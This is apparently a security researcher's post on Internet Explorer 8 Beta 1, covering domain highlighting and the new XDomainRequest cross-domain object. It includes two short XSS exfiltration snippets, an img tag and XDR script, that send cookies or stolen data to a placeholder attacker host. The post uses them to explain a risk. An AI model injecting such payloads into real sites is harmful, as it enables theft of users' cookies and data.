Microsoft recently released Windows Internet Explorer 8 Beta 1 to the public. While the developer tools and other features are receiving a lot of interest, this release also includes new security features and concerns that require some attention.

One new security feature is domain highlighting:

Screenshot of domain highlighting:

Phishing sites often use naming techniques such as the one shown in the screenshot. This often confuses users into thinking that they have reached a legitimate Web site, because the domain name they are trying to visit is within the URL. This new highlighting technique will help to thwart such attempts once users upgrade and are aware of this new protection. Firefox users can achieve the same effect by installing the Location^2 plugin.

Cross Domain Requests

When same origin policy restrictions apply, in order to make requests to other sites, you typically need a proxy to make requests on your behalf. These restrictions were created in an attempt to prevent unauthorized communication with external entities such as malicious Web sites. The typical flow of such a request can be seen below:

Internet Explorer 8 breaks the boundaries of the same origin policy by adding the capability to make cross-domain requests with the new XDR object. The restrictions on this type of communication are shown here:

A couple of other interesting restrictions are:
- The protocols of each site must match (you cannot communicate between https:// and http://, and vice-versa).
- The requested page must return the XDomainRequestAllowed header with a value of 1.

Additional technical details and examples can be found here.

Security Concerns

Because Internet Explorer 8 allows cross domain requests, malicious attackers can use content injection holes in Web sites a lot more efficiently. Typically, when a site is vulnerable to XSS (cross-site scripting), an attacker will inject content to steal user information and relay it back as follows:

<imgsrc="http://bad guy.com/steal.php?cookie=" + cookie />

The <img> tag is used because it is one of the few things allowed to communicate externally. With the new XDR object, the attacker can simply insert script code that communicates directly to a malicious server:

var xdr = new XDomainRequest();
xdr.open("POST", "http://www.bad guy.com/");
xdr.send(stolenInfo);


With direct communication, it is foreseeable that injection payloads will evolve in complexity and features. Malicious frameworks can be built so that the client is constantly communicating with the malicious server to determine what actions to take next. Stealing user information is just the start of what can be achieved with new emerging technologies such as these.

Conclusion

The concept of direct, external communication via the XDR object in Microsoft Internet Explorer 8 is nothing new. Similar communication has been achieved through other means, such as img tags, script src includes, iframes, flash files, and so on. It is also important to note that IE8's external communication policy is not extremely unique and actually resembles Flash's; both retrieve policy information on the request host (XDomainRequestAllowed header and crossdomain.xml respectively). The benefit of direct communication is so large in terms of product development and interactivity that other browsers, such as Firefox, are also implementing cross-domain request capabilities into their product. Security is always at odds with functionality, leading to tradeoffs without a clear solution.

Security Researcher: Joren McReynolds